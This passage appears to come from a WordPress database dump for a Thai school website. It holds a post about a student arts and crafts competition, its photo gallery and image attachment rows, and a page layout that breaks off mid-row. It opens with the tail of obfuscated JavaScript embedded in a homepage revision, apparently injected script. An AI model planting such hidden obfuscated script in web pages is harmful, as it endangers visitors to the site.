_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-08-27 14:15:25','2025-08-27 07:15:25','',14,'http://pakhaeng.ssk.in.th/?p=2000',0,'revision','',0),
(2002,1,'2025-09-11 14:19:31','2025-09-11 07:19:31','<!-- wp:paragraph -->\n<p><strong>กลุ่มเครือข่ายคุณภาพการศึกษาแบบบุรณาการ CEO ประจิมโนนคูณ</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>วันที่ 10 กันยายน 2568 กลุ่มเครือข่ายคุณภาพการศึกษาแบบบุรณาการ CEO ประจิมโนนคูณ จัดกิจกรรมการแข่งขันศิลปหัตถกรรมนักเรียนรหว่างวันที่ 10-12 กันยายน พ.ศ. 2568 ในการนี้ได้รับเกียรติจาก นายสุเทพ ศรบุญทอง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 เป็นประธานในพิธีเปิด การจัดการแข่งขันในครั้งนี้จัดขึ้น ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่และโรงเรียนบ้านโพธิ์ (โพธิ์ทองวิทยา) มีการจัดการแข่งขันในระดับกลุ่ม CEO ทั้งหมด 63 รายการ เพื่อหาตัวแทนเข้าร่วมการการแข่งขันมนระดับเขตพื้นที่การศึกษาต่อไป</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":2003,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546057733_1370770235048862_2315989396339135817_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2003\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2004,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545515631_1370766771715875_2101698765087175476_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2004\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2006,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546710429_1370769548382264_6907031697176291305_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2006\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2007,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545137491_1370769421715610_5706139419919357224_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2007\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2005,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545508425_1370769281715624_2525098912561904063_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2005\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2008,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546070446_1370769055048980_8142323871884316008_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2008\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2009,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546462779_1370768925048993_7895970185212061007_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2009\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2010,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/544909618_1370768151715737_1378513358628300785_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2010\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2011,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546292379_1370767351715817_3174345509212405828_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2011\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2012,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/547183079_1370759228383296_6433183860505725960_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2012\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2014,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545612451_1370759071716645_3274378198375273117_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2014\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2013,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545696609_1370758981716654_8478641995253835673_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2013\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2015,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545362183_1370758961716656_9072266310043210898_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2015\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2016,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546172095_1370758868383332_4437369802683811255_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2016\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2017,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545017562_1370758045050081_7816319960054490006_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2017\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2018,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545764562_1370757951716757_4501286291657514381_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2018\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2019,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545433805_1370757855050100_2960727026231077162_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2019\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2020,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546874841_1370757715050114_1059989753242858587_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2020\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2021,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546585466_1370756565050229_6814901706477756744_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2021\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2022,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545355085_1370755078383711_321736156690607878_n.jpg\" alt=\"\" class=\"wp-image-2022\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2023,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546713779_1370754925050393_7712748643539705091_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2023\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','กิจกรรม การแข่งขันศิลปหัตถกรรม','','publish','closed','closed','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab','','','2025-09-11 14:19:32','2025-09-11 07:19:32','',0,'http://pakhaeng.ssk.in.th/?p=2002',0,'post','',0),
(2003,1,'2025-09-11 14:18:51','2025-09-11 07:18:51','','546057733_1370770235048862_2315989396339135817_n','','inherit','','closed','','546057733_1370770235048862_2315989396339135817_n','','','2025-09-11 14:18:51','2025-09-11 07:18:51','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546057733_1370770235048862_2315989396339135817_n.jpg',0,'attachment','image/jpeg',0),
(2004,1,'2025-09-11 14:18:52','2025-09-11 07:18:52','','545515631_1370766771715875_2101698765087175476_n','','inherit','','closed','','545515631_1370766771715875_2101698765087175476_n','','','2025-09-11 14:18:52','2025-09-11 07:18:52','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545515631_1370766771715875_2101698765087175476_n.jpg',0,'attachment','image/jpeg',0),
(2005,1,'2025-09-11 14:18:52','2025-09-11 07:18:52','','545508425_1370769281715624_2525098912561904063_n','','inherit','','closed','','545508425_1370769281715624_2525098912561904063_n','','','2025-09-11 14:18:52','2025-09-11 07:18:52','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545508425_1370769281715624_2525098912561904063_n.jpg',0,'attachment','image/jpeg',0),
(2006,1,'2025-09-11 14:18:52','2025-09-11 07:18:52','','546710429_1370769548382264_6907031697176291305_n','','inherit','','closed','','546710429_1370769548382264_6907031697176291305_n','','','2025-09-11 14:18:52','2025-09-11 07:18:52','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546710429_1370769548382264_6907031697176291305_n.jpg',0,'attachment','image/jpeg',0),
(2007,1,'2025-09-11 14:18:53','2025-09-11 07:18:53','','545137491_1370769421715610_5706139419919357224_n','','inherit','','closed','','545137491_1370769421715610_5706139419919357224_n','','','2025-09-11 14:18:53','2025-09-11 07:18:53','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545137491_1370769421715610_5706139419919357224_n.jpg',0,'attachment','image/jpeg',0),
(2008,1,'2025-09-11 14:18:53','2025-09-11 07:18:53','','546070446_1370769055048980_8142323871884316008_n','','inherit','','closed','','546070446_1370769055048980_8142323871884316008_n','','','2025-09-11 14:18:53','2025-09-11 07:18:53','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546070446_1370769055048980_8142323871884316008_n.jpg',0,'attachment','image/jpeg',0),
(2009,1,'2025-09-11 14:18:55','2025-09-11 07:18:55','','546462779_1370768925048993_7895970185212061007_n','','inherit','','closed','','546462779_1370768925048993_7895970185212061007_n','','','2025-09-11 14:18:55','2025-09-11 07:18:55','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546462779_1370768925048993_7895970185212061007_n.jpg',0,'attachment','image/jpeg',0),
(2010,1,'2025-09-11 14:18:55','2025-09-11 07:18:55','','544909618_1370768151715737_1378513358628300785_n','','inherit','','closed','','544909618_1370768151715737_1378513358628300785_n','','','2025-09-11 14:18:55','2025-09-11 07:18:55','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/544909618_1370768151715737_1378513358628300785_n.jpg',0,'attachment','image/jpeg',0),
(2011,1,'2025-09-11 14:18:55','2025-09-11 07:18:55','','546292379_1370767351715817_3174345509212405828_n','','inherit','','closed','','546292379_1370767351715817_3174345509212405828_n','','','2025-09-11 14:18:55','2025-09-11 07:18:55','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546292379_1370767351715817_3174345509212405828_n.jpg',0,'attachment','image/jpeg',0),
(2012,1,'2025-09-11 14:18:56','2025-09-11 07:18:56','','547183079_1370759228383296_6433183860505725960_n','','inherit','','closed','','547183079_1370759228383296_6433183860505725960_n','','','2025-09-11 14:18:56','2025-09-11 07:18:56','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/547183079_1370759228383296_6433183860505725960_n.jpg',0,'attachment','image/jpeg',0),
(2013,1,'2025-09-11 14:18:56','2025-09-11 07:18:56','','545696609_1370758981716654_8478641995253835673_n','','inherit','','closed','','545696609_1370758981716654_8478641995253835673_n','','','2025-09-11 14:18:56','2025-09-11 07:18:56','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545696609_1370758981716654_8478641995253835673_n.jpg',0,'attachment','image/jpeg',0),
(2014,1,'2025-09-11 14:18:57','2025-09-11 07:18:57','','545612451_1370759071716645_3274378198375273117_n','','inherit','','closed','','545612451_1370759071716645_3274378198375273117_n','','','2025-09-11 14:18:57','2025-09-11 07:18:57','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545612451_1370759071716645_3274378198375273117_n.jpg',0,'attachment','image/jpeg',0),
(2015,1,'2025-09-11 14:18:57','2025-09-11 07:18:57','','545362183_1370758961716656_9072266310043210898_n','','inherit','','closed','','545362183_1370758961716656_9072266310043210898_n','','','2025-09-11 14:18:57','2025-09-11 07:18:57','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545362183_1370758961716656_9072266310043210898_n.jpg',0,'attachment','image/jpeg',0),
(2016,1,'2025-09-11 14:18:59','2025-09-11 07:18:59','','546172095_1370758868383332_4437369802683811255_n','','inherit','','closed','','546172095_1370758868383332_4437369802683811255_n','','','2025-09-11 14:18:59','2025-09-11 07:18:59','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546172095_1370758868383332_4437369802683811255_n.jpg',0,'attachment','image/jpeg',0),
(2017,1,'2025-09-11 14:18:59','2025-09-11 07:18:59','','545017562_1370758045050081_7816319960054490006_n','','inherit','','closed','','545017562_1370758045050081_7816319960054490006_n','','','2025-09-11 14:18:59','2025-09-11 07:18:59','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545017562_1370758045050081_7816319960054490006_n.jpg',0,'attachment','image/jpeg',0),
(2018,1,'2025-09-11 14:18:59','2025-09-11 07:18:59','','545764562_1370757951716757_4501286291657514381_n','','inherit','','closed','','545764562_1370757951716757_4501286291657514381_n','','','2025-09-11 14:18:59','2025-09-11 07:18:59','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545764562_1370757951716757_4501286291657514381_n.jpg',0,'attachment','image/jpeg',0),
(2019,1,'2025-09-11 14:19:00','2025-09-11 07:19:00','','545433805_1370757855050100_2960727026231077162_n','','inherit','','closed','','545433805_1370757855050100_2960727026231077162_n','','','2025-09-11 14:19:00','2025-09-11 07:19:00','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545433805_1370757855050100_2960727026231077162_n.jpg',0,'attachment','image/jpeg',0),
(2020,1,'2025-09-11 14:19:00','2025-09-11 07:19:00','','546874841_1370757715050114_1059989753242858587_n','','inherit','','closed','','546874841_1370757715050114_1059989753242858587_n','','','2025-09-11 14:19:00','2025-09-11 07:19:00','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546874841_1370757715050114_1059989753242858587_n.jpg',0,'attachment','image/jpeg',0),
(2021,1,'2025-09-11 14:19:01','2025-09-11 07:19:01','','546585466_1370756565050229_6814901706477756744_n','','inherit','','closed','','546585466_1370756565050229_6814901706477756744_n','','','2025-09-11 14:19:01','2025-09-11 07:19:01','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546585466_1370756565050229_6814901706477756744_n.jpg',0,'attachment','image/jpeg',0),
(2022,1,'2025-09-11 14:19:02','2025-09-11 07:19:02','','545355085_1370755078383711_321736156690607878_n','','inherit','','closed','','545355085_1370755078383711_321736156690607878_n','','','2025-09-11 14:19:02','2025-09-11 07:19:02','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545355085_1370755078383711_321736156690607878_n.jpg',0,'attachment','image/jpeg',0),
(2023,1,'2025-09-11 14:19:03','2025-09-11 07:19:03','','546713779_1370754925050393_7712748643539705091_n','','inherit','','closed','','546713779_1370754925050393_7712748643539705091_n','','','2025-09-11 14:19:03','2025-09-11 07:19:03','',2002,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546713779_1370754925050393_7712748643539705091_n.jpg',0,'attachment','image/jpeg',0),
(2024,1,'2025-09-11 14:19:31','2025-09-11 07:19:31','<!-- wp:paragraph -->\n<p><strong>กลุ่มเครือข่ายคุณภาพการศึกษาแบบบุรณาการ CEO ประจิมโนนคูณ</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>วันที่ 10 กันยายน 2568 กลุ่มเครือข่ายคุณภาพการศึกษาแบบบุรณาการ CEO ประจิมโนนคูณ จัดกิจกรรมการแข่งขันศิลปหัตถกรรมนักเรียนรหว่างวันที่ 10-12 กันยายน พ.ศ. 2568 ในการนี้ได้รับเกียรติจาก นายสุเทพ ศรบุญทอง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 เป็นประธานในพิธีเปิด การจัดการแข่งขันในครั้งนี้จัดขึ้น ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่และโรงเรียนบ้านโพธิ์ (โพธิ์ทองวิทยา) มีการจัดการแข่งขันในระดับกลุ่ม CEO ทั้งหมด 63 รายการ เพื่อหาตัวแทนเข้าร่วมการการแข่งขันมนระดับเขตพื้นที่การศึกษาต่อไป</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":2003,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546057733_1370770235048862_2315989396339135817_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2003\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2004,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545515631_1370766771715875_2101698765087175476_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2004\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2006,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546710429_1370769548382264_6907031697176291305_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2006\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2007,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545137491_1370769421715610_5706139419919357224_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2007\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2005,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545508425_1370769281715624_2525098912561904063_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2005\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2008,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546070446_1370769055048980_8142323871884316008_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2008\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2009,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546462779_1370768925048993_7895970185212061007_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2009\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2010,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/544909618_1370768151715737_1378513358628300785_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2010\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2011,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546292379_1370767351715817_3174345509212405828_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2011\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2012,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/547183079_1370759228383296_6433183860505725960_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2012\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2014,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545612451_1370759071716645_3274378198375273117_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2014\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2013,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545696609_1370758981716654_8478641995253835673_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2013\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2015,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545362183_1370758961716656_9072266310043210898_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2015\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2016,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546172095_1370758868383332_4437369802683811255_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2016\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2017,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545017562_1370758045050081_7816319960054490006_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2017\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2018,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545764562_1370757951716757_4501286291657514381_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2018\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2019,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545433805_1370757855050100_2960727026231077162_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2019\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2020,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546874841_1370757715050114_1059989753242858587_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2020\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2021,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546585466_1370756565050229_6814901706477756744_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2021\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2022,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/545355085_1370755078383711_321736156690607878_n.jpg\" alt=\"\" class=\"wp-image-2022\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":2023,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/546713779_1370754925050393_7712748643539705091_n-1024x683.jpg\" alt=\"\" class=\"wp-image-2023\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','กิจกรรม การแข่งขันศิลปหัตถกรรม','','inherit','closed','closed','','2002-revision-v1','','','2025-09-11 14:19:31','2025-09-11 07:19:31','',2002,'http://pakhaeng.ssk.in.th/?p=2024',0,'revision','',0),
(2026,1,'2025-09-11 14:25:28','2025-09-11 07:25:28','','Blue and Yellow Geometric Welcome Messages and Announcement High School Back to School Banner','','inherit','','closed','','blue-and-yellow-geometric-welcome-messages-and-announcement-high-school-back-to-school-banner','','','2025-09-11 14:25:28','2025-09-11 07:25:28','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png',0,'attachment','image/png',0),
(2027,1,'2025-09-11 14:25:59','2025-09-11 07:25:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[2026],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"linkTo\":\"custom\",\"captionStyles\":[{\"size\":[\"\",\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":6,\"textTransform\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"background\":\"#000000\",\"backgroundOpacity\":0.5}],\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1500